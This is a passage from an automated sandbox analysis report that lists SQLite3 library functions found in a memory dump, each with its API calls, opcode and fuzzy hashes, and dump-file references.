                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                                                            • String ID: d
                                                                                                                                            • API String ID: 211589378-2564639436
                                                                                                                                            • Opcode ID: e778d82be7c8906666bd0ff5fe3f94cc2e5661bf9373860bb9fb6c14576a39d8
                                                                                                                                            • Instruction ID: 0c631066cbf4fa08d7bcf6560ecd030fd38e3682c5884a7dc53f570728a8340e
                                                                                                                                            • Opcode Fuzzy Hash: e778d82be7c8906666bd0ff5fe3f94cc2e5661bf9373860bb9fb6c14576a39d8
                                                                                                                                            • Instruction Fuzzy Hash: 5321E6B5A08255CFDB00CFA9C4C1B99BBF4EF89314F248469C9489B319E779E845CBA1
                                                                                                                                            Function 61E1EEFC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                                                            • String ID: 8
                                                                                                                                            • API String ID: 2918918774-4194326291
                                                                                                                                            • Opcode ID: 3b4558998f03f0f8d720dc5d23eeeeebf0f63cba4009bf22359312ea7e28c22a
                                                                                                                                            • Instruction ID: 53da35cb102cfa1b6c82c6743a61b423be6c73d6f643334cd8418a593aabd865
                                                                                                                                            • Opcode Fuzzy Hash: 3b4558998f03f0f8d720dc5d23eeeeebf0f63cba4009bf22359312ea7e28c22a
                                                                                                                                            • Instruction Fuzzy Hash: A21156B59043068FCB04CF6AD48098ABBF5FF88364F15C56AE8188B320E335E951CB91
                                                                                                                                            Function 61E28174 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E28068: sqlite3_log.SQLITE3(?,?,?,?,?,61E2811B), ref: 61E280A3
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E281A7
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E281C0
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E281DA
                                                                                                                                              • Part of subcall function 61E25809: sqlite3_log.SQLITE3 ref: 61E25832
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                                                            • String ID: out of memory
                                                                                                                                            • API String ID: 645246966-2599737071
                                                                                                                                            • Opcode ID: 9592a935918f54e41e548228a924403269073ec91dfc37b297232e50d017421a
                                                                                                                                            • Instruction ID: 7180b9862eeba02cab12f31a15ae79ff253e57359bb306b2cd6d09ebc6df2a8f
                                                                                                                                            • Opcode Fuzzy Hash: 9592a935918f54e41e548228a924403269073ec91dfc37b297232e50d017421a
                                                                                                                                            • Instruction Fuzzy Hash: F60181B1B082458BDB449FA9CCD1A1AB7E4AF49308F34C079DC448F305E776D990DB51
                                                                                                                                            Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                                                            • API String ID: 1646373207-328863460
                                                                                                                                            • Opcode ID: 5e85dde6cb5c46402a4b2b2e62fdc1df9b5440ef12c41244f1713789e34802d2
                                                                                                                                            • Instruction ID: 833ae47598551453ce9db1403a2be1c9df0a0efb7b7b5b30436022f0f45934aa
                                                                                                                                            • Opcode Fuzzy Hash: 5e85dde6cb5c46402a4b2b2e62fdc1df9b5440ef12c41244f1713789e34802d2
                                                                                                                                            • Instruction Fuzzy Hash: DFE0EDB49147419BEB407FE9840672EBBB9AFC260AF72C85CD494862A4F770C492D763
                                                                                                                                            Function 61E1EB29 Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1EB90
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1ECA7
                                                                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 61E1EDCA
                                                                                                                                            • sqlite3_result_double.SQLITE3 ref: 61E1EDDF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4229029058-0
                                                                                                                                            • Opcode ID: d0d8b196de7cda87409db5e0e5343ac5b6b0ca0b61516e7f03a6efe073045b82
                                                                                                                                            • Instruction ID: fb01b16f0994e05efb05618662f8972c6ca21f6043189b20b19fe847c1b53e00
                                                                                                                                            • Opcode Fuzzy Hash: d0d8b196de7cda87409db5e0e5343ac5b6b0ca0b61516e7f03a6efe073045b82
                                                                                                                                            • Instruction Fuzzy Hash: F1A11870A08A09DFCB15DF69C584A8EBBF0FF88354F618829E859E7354EB30D9518B81
                                                                                                                                            Function 61E1E62B Relevance: 6.1, APIs: 4, Instructions: 120COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2374424446-0
                                                                                                                                            • Opcode ID: 1baeebad4c1a3a26bc563d193997f93c59ad12c2f11441af7ba87becf9303165
                                                                                                                                            • Instruction ID: 136e325a3bc7a989bacb598aa4dcba8509b65a29eb3b79868d56b1e27bd2fd03
                                                                                                                                            • Opcode Fuzzy Hash: 1baeebad4c1a3a26bc563d193997f93c59ad12c2f11441af7ba87becf9303165
                                                                                                                                            • Instruction Fuzzy Hash: 93514874D08359CFEB20DFA9C98478DBBF1AF45308F1085A9E448AB285D7759A84CF12
                                                                                                                                            Function 61E1FC3F Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1FC7B
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_value_dup.SQLITE3 ref: 61E1FCD2
                                                                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 61E1FD07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 405757302-0
                                                                                                                                            • Opcode ID: 68d572a4c6402f453158b51b8cf2fcca59753bad2e2d850b2e81e9224d04b467
                                                                                                                                            • Instruction ID: 4fde834cf7d313903c13ca125cde073186d7b4735a313237e85520166a8b19a9
                                                                                                                                            • Opcode Fuzzy Hash: 68d572a4c6402f453158b51b8cf2fcca59753bad2e2d850b2e81e9224d04b467
                                                                                                                                            • Instruction Fuzzy Hash: 3A31F5B5E042198FCB00DFA9D48199EBBF0FF88314F55846AE858AB314D735E955CFA0
                                                                                                                                            Function 61E36EAE Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E36EBA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E36EDA
                                                                                                                                            • sqlite3_vfs_find.SQLITE3 ref: 61E36F19
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E37018
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 321126751-0
                                                                                                                                            • Opcode ID: d6a461f65a62ae150a46f75019947c5b19758ea2025f1891783cf6a8eca7e6e5
                                                                                                                                            • Instruction ID: 3a4c2375905abddff43da70767d102b94ae39431892a66ef335508345db4bc7f
                                                                                                                                            • Opcode Fuzzy Hash: d6a461f65a62ae150a46f75019947c5b19758ea2025f1891783cf6a8eca7e6e5
                                                                                                                                            • Instruction Fuzzy Hash: 7A414A3485C2E88EC7268B3885407D97FF0DF9A708F1988DED4C48B352C636C689CB51
                                                                                                                                            Function 61E24C52 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3596987688-0
                                                                                                                                            • Opcode ID: f031563807f16e2c612ab855e5c9196a1609a28ebaec0794fd828fd89ef474f6
                                                                                                                                            • Instruction ID: bad303952f1f456d16a87834cf4a3924523d4797ea5acfcc842eb63110c7c1b7
                                                                                                                                            • Opcode Fuzzy Hash: f031563807f16e2c612ab855e5c9196a1609a28ebaec0794fd828fd89ef474f6
                                                                                                                                            • Instruction Fuzzy Hash: 2F31F2B1A087069FC700DF69C88169EBBF4BB88364F24C92EE4A8D7390D774D9418F91
                                                                                                                                            Function 61E22A14 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_win32_is_nt.SQLITE3 ref: 61E22A8A
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E22B22
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E22B42
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E22B4A
                                                                                                                                              • Part of subcall function 61E12FAA: sqlite3_free.SQLITE3 ref: 61E13050
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4082161338-0
                                                                                                                                            • Opcode ID: 0eaa140a88e282367239eb04aebcd7bcd73a2167832a8ce833be5fee5dc7ea8d
                                                                                                                                            • Instruction ID: 1545aa548982d847fda2b20210b0eda85ef1c1096dd86b25b887c858bf0cbe94
                                                                                                                                            • Opcode Fuzzy Hash: 0eaa140a88e282367239eb04aebcd7bcd73a2167832a8ce833be5fee5dc7ea8d
                                                                                                                                            • Instruction Fuzzy Hash: EB31AFB09183469BD700AFA9C45475EBBF4BB89749F20C81EE4989B340D779C545CF92
                                                                                                                                            Function 61E19B9F Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E19BB9
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E19C01
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E19C28
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E19C56
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2308590742-0
                                                                                                                                            • Opcode ID: 34db3af258634af25f41eab726fcf2222893ef0bc47f478563414d6182194d53
                                                                                                                                            • Instruction ID: f2bc3e0c893ca387c9fb73a2d58c7151adc9fed3e59da9fee5f15724ab28e8c6
                                                                                                                                            • Opcode Fuzzy Hash: 34db3af258634af25f41eab726fcf2222893ef0bc47f478563414d6182194d53
                                                                                                                                            • Instruction Fuzzy Hash: 9821C07170C2418BE709CEA9858275B7BEAEFC5318F39C468DCD88B349C775D8428B51
                                                                                                                                            Function 61E14174 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E141A2
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E141F9
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E14216
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E1423D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            • Opcode ID: e4703dfb88fae64b46f605277e852d05ace32d213e893c00f8887850450c2fcc
                                                                                                                                            • Instruction ID: 84c292680c0d9c064b51162814f81ed37a2395bc54ecc127b2c643f1ef19c8a5
                                                                                                                                            • Opcode Fuzzy Hash: e4703dfb88fae64b46f605277e852d05ace32d213e893c00f8887850450c2fcc
                                                                                                                                            • Instruction Fuzzy Hash: F9116771B98A418FCF00AFA8C69164577F5FB8630CB24882FE944CB324E739D894CB52
                                                                                                                                            Function 61E24479 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
